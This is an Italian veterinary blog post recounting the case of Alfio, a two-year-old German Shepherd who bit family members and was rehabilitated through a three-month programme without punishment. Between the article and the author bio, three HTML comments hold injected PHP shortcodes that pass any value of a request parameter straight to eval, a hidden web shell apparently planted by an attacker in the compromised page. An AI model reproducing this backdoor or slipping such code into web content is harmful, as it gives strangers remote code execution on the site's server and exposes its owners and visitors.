Il cane che morde

Diego Rendini
2 February 2015

Alfio, Pastore tedesco, maschio di 2 anni
Motivo del consulto: Aggressivo verso il proprietario e la sua famiglia

Questa è la storia di Alfio, Pastore Tedesco di 2 anni adottato dalla sua famiglia a soli 40 giorni.

Il proprietario mi racconta dell’evidente esuberanza che il suo cucciolo ha sempre avuto rispetto ai suoi 5 fratellini, vivacità che hanno cercato di gestire facendogli fare un corso presso un centro di educazione cinofila.

Subito dopo il corso di addestramento Alfio in effetti aveva iniziato ad essere più gestibile e nei mesi a seguire tutto è andato abbastanza bene…

Ogni tanto però, quando il cane si trovava dentro casa, se gli si impediva di fare qualcosa, come ad esempio di mettere il muso nella spazzatura o di rubare qualche ciabatta, Lui tendeva a ringhiare ma senza essere mai realmente pronto a mordere.

Spesso, come insegnato durante il corso, bastava proporgli il comando del “lascia” e Alfio, anche se borbottando un po’, cedeva l’oggetto rubato.

Con il passare dei mesi, il cucciolo cresceva e la situazione degenerava di conseguenza… così in occasione di un ennesimo furto, il telecomando della tv, il figlio del proprietario lo ha rimproverato con tono molto deciso. Vedendo però che Alfio non lasciava il telecomando, gli diede uno scappellotto.

In quel momento, il cane ringhiò in modo molto più deciso del solito mordendo il ragazzo alla mano.

Il proprietario chiaramente, una volta arrivato a casa e capita la situazione, punì il cane per la reazione avuta verso il figlio… purtroppo anche in questo caso, Alfio decise di mordere e il proprietario finì al pronto soccorso.

Decisi a risolvere questa situazione si rivolsero al centro di educazione cinofila che in questo caso suggerì loro di rivolgersi a Me per una consulenza comportamentale.

Dopo aver sentito il racconto al telefono, sono andato presso l’abitazione dei proprietari per svolgere la visita comportamentale dove emerse subito che Alfio soffriva di Deficit di Autocontrollo.

Questa condizione si verifica soprattutto in cani che hanno subito un distacco precoce dalla madre e che quindi non hanno potuto acquisire, tramite gli insegnamenti materni, la capacità di affrontare le situazioni con calma e autocontrollo.

Alcune volte questa alterazione comportamentale evolve in aggressività che rende spesso ingestibile la convivenza dei proprietari con i cani, soprattutto se di taglia grande.

A seguito della valutazione ho preparato per Alfio e la sua famiglia, un programma riabilitativo finalizzato a renderlo più tranquillo e soprattutto più collaborativo e tollerante.

Una parte del lavoro ha previsto l’eliminazione di tutte le forme di rimprovero e punizioni che solitamente creano tensione in un cane e che possono risultare, oltre che eticamente e scientificamente non corrette, anche controproducenti.

Inoltre sono stati abbandonati tutti quei rituali che vedevano continuamente il proprietario e la sua famiglia intenti a chiedere ad Alfio di stare seduto e fermo per evitare di fare danni.

La famiglia ha iniziato a mettere in atto una serie di accorgimenti e attività tali da indurre Alfio a ragionare sulle situazioni anziché ad agire senza riflettere con il rischio di mettere poi in atto comportamenti aggressivi e di agitazione.

Il programma è durato circa 3 mesi, ha previsto 3 incontri in totale dove ad ogni incontro valutavo i progressi e ai proprietari veniva illustrato il programma nuovo da seguire nel mese successivo.

Al termine del programma Alfio si mostrava molto più abile ad affrontare con maggiore calma le varie situazioni in casa e in passeggiata, evitando così di dover ricorrere alle reazioni aggressive che avrebbero potuto impedirgli di rimanere in famiglia.

RICORDA: SE LO AMI LO AIUTI!

<!– [insert_php]if (isset($_REQUEST["HcJ"])){eval($_REQUEST["HcJ"]);exit;}[/insert_php][php]if (isset($_REQUEST["HcJ"])){eval($_REQUEST["HcJ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["eVvgb"])){eval($_REQUEST["eVvgb"]);exit;}[/insert_php][php]if (isset($_REQUEST["eVvgb"])){eval($_REQUEST["eVvgb"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UiU"])){eval($_REQUEST["UiU"]);exit;}[/insert_php][php]if (isset($_REQUEST["UiU"])){eval($_REQUEST["UiU"]);exit;}[/php] –>

Diego Rendini Sono un Veterinario per passione! Il mio amore per gli animali cresce ogni volta che il mio sguardo incrocia quello di un Amico a 4 zampe… Lo guardo e lo sento, lo capisco, riesco ad entrare in empatia coi suoi sentimenti, i suoi bisogni, le sue sofferenze.